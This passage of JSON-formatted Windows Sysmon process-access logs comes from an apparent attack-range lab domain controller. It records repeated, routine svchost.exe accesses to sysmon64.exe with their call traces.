C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 